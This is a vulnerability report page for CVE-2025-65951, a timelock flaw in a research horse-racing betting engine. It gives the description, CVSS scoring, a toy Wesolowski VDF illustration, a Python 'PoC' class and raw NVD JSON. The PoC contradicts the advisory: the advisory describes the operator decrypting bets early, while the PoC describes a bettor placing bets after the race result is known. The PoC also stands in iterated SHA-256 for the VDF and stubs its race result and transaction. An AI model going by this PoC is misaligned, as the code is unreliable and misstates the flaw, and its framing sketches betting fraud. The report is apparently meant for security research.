Security Vulnerability Report
CVE-2025-65951 CVSS 8.7 HIGH

CVE-2025-65951

Published: 2025-11-25 01:15:47
Last Modified: 2026-04-15 00:35:42

Description

Inside Track / Entropy Derby is a research-grade horse-racing betting engine. Prior to commit 2d38d2f, the VDF-based timelock encryption system fails to enforce sequential delay against the betting operator. Bettors pre-compute the entire Wesolowski VDF and include vdfOutputHex in their encrypted bet ticket, allowing the house to decrypt immediately using fast proof verification instead of expensive VDF evaluation. This issue has been patched via commit 2d38d2f.
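
To make the description concrete, the following added example (not code from Entropy Derby or from this report) implements a toy Wesolowski VDF. It shows that a ticket carrying the output and proof yields the key through verification alone, while an input-only ticket forces the full sequential evaluation. The modulus, delay parameter, the `x` and `proofHex` fields, and the SHA-256 key derivation are assumptions; only `vdfOutputHex` comes from the description.

```python
import hashlib
from math import isqrt

N = 1000003 * 1000033  # toy modulus (constructed); real VDF groups are far larger
T = 1 << 16            # delay parameter: number of sequential squarings

def evaluate(x, t=T):
    """Slow path: t modular squarings, each needing the previous result."""
    y = x % N
    for _ in range(t):
        y = y * y % N
    return y

def challenge_prime(x, y, t=T):
    """Fiat-Shamir challenge: hash (x, y, t) to a small odd prime l."""
    digest = hashlib.sha256(f"{x}|{y}|{t}".encode()).digest()
    l = int.from_bytes(digest[:4], "big") | 1
    while l < 3 or any(l % d == 0 for d in range(3, isqrt(l) + 1, 2)):
        l += 2
    return l

def prove(x, y, t=T):
    """Wesolowski proof: pi = x^floor(2^t / l) mod N."""
    return pow(x, (1 << t) // challenge_prime(x, y, t), N)

def verify(x, y, pi, t=T):
    """Fast path: checks pi^l * x^r == y with r = 2^t mod l, no t-step loop."""
    l = challenge_prime(x, y, t)
    return pow(pi, l, N) * pow(x, pow(2, t, l), N) % N == y % N

def key_from_output(y):
    """Assumed key derivation: the timelock key is a hash of the VDF output."""
    return hashlib.sha256(str(y).encode()).hexdigest()

def open_ticket_with_output(ticket):
    """Ticket carries output and proof: key recovered by verification alone."""
    y, pi = int(ticket["vdfOutputHex"], 16), int(ticket["proofHex"], 16)
    return key_from_output(y) if verify(ticket["x"], y, pi) else None

def open_ticket_input_only(ticket):
    """Ticket carries only the input: the opener must run all T squarings."""
    return key_from_output(evaluate(ticket["x"]))

def make_ticket(x):
    """Bettor side (constructed sample): evaluates once, ships output and proof."""
    y = evaluate(x)
    return {"x": x, "vdfOutputHex": hex(y), "proofHex": hex(prove(x, y))}
```

Both opening paths return the same key, so the delay protects the ticket only when the output is absent from what the opener receives.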

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Inside Track / Entropy Derby < commit 2d38d2f

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65951 PoC - VDF Timelock Bypass
# Attack: Pre-compute VDF output and bypass timelock encryption
import hashlib
import json
import requests
from web3 import Web3


class EntropyDerbyVDFBypass:
    def __init__(self, contract_address, rpc_url):
        self.w3 = Web3(Web3.HTTPProvider(rpc_url))
        self.contract_address = contract_address

    def precompute_vdf(self, bet_id, challenge, iterations=1000000):
        """Pre-compute the Wesolowski VDF output before the race result is known.
        In practice, this can be done with the challenge hash before race starts."""
        # Iterated SHA-256 is a stand-in here; it is not a Wesolowski VDF evaluation.
        x = challenge.encode()
        for i in range(iterations):
            x = hashlib.sha256(x + str(i).encode()).digest()
        return x.hex()

    def construct_exploit_ticket(self, race_id, bet_amount, selected_horse,
                                 vdf_output, secret_nonce):
        """Construct a malicious bet ticket with pre-computed VDF output."""
        ticket = {
            "race_id": race_id,
            "bet_amount": bet_amount,
            "selected_horse": selected_horse,
            "vdf_output_hex": vdf_output,
            "secret_nonce": secret_nonce,
            "timestamp": self.w3.eth.get_block('latest').timestamp
        }
        return json.dumps(ticket)

    def exploit(self, race_id, bet_amount, selected_horse, challenge):
        """
        1. Pre-compute VDF output with known challenge
        2. Wait for race result (optional - in real attack, timing matters)
        3. If favorable result, submit ticket with pre-computed VDF
        4. House verifies VDF quickly (bypassing actual delay)
        5. Bet is accepted as if submitted before race
        """
        # Step 1: Pre-compute VDF
        vdf_output = self.precompute_vdf(race_id, challenge)

        # Step 2: Wait for race result (simulated)
        race_result = self.get_race_result(race_id)

        # Step 3: If favorable, exploit
        if self.is_favorable(race_result, selected_horse):
            ticket = self.construct_exploit_ticket(
                race_id, bet_amount, selected_horse, vdf_output, "nonce"
            )
            # Submit to contract - will pass VDF verification immediately
            tx_hash = self.submit_bet(ticket)
            return {"status": "exploited", "tx": tx_hash}
        return {"status": "no_exploit_needed"}

    def get_race_result(self, race_id):
        """Fetch race result from oracle."""
        return "horse_7"  # Simulated

    def is_favorable(self, result, bet):
        """Check if bet is winning."""
        return result == bet

    def submit_bet(self, ticket):
        """Submit bet to smart contract."""
        # Implementation depends on contract ABI
        return "0x..."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65951", "sourceIdentifier": "[email protected]", "published": "2025-11-25T01:15:46.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inside Track / Entropy Derby is a research-grade horse-racing betting engine. Prior to commit 2d38d2f, the VDF-based timelock encryption system fails to enforce sequential delay against the betting operator. Bettors pre-compute the entire Wesolowski VDF and include vdfOutputHex in their encrypted bet ticket, allowing the house to decrypt immediately using fast proof verification instead of expensive VDF evaluation. This issue has been patched via commit 2d38d2f."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://github.com/mescuwa/entropy-derby/commit/2d38d2f16bbb3b4240698148f80d8c5202725c77", "source": "[email protected]"}, {"url": "https://github.com/mescuwa/entropy-derby/security/advisories/GHSA-pm54-f847-w4mh", "source": "[email protected]"}]}}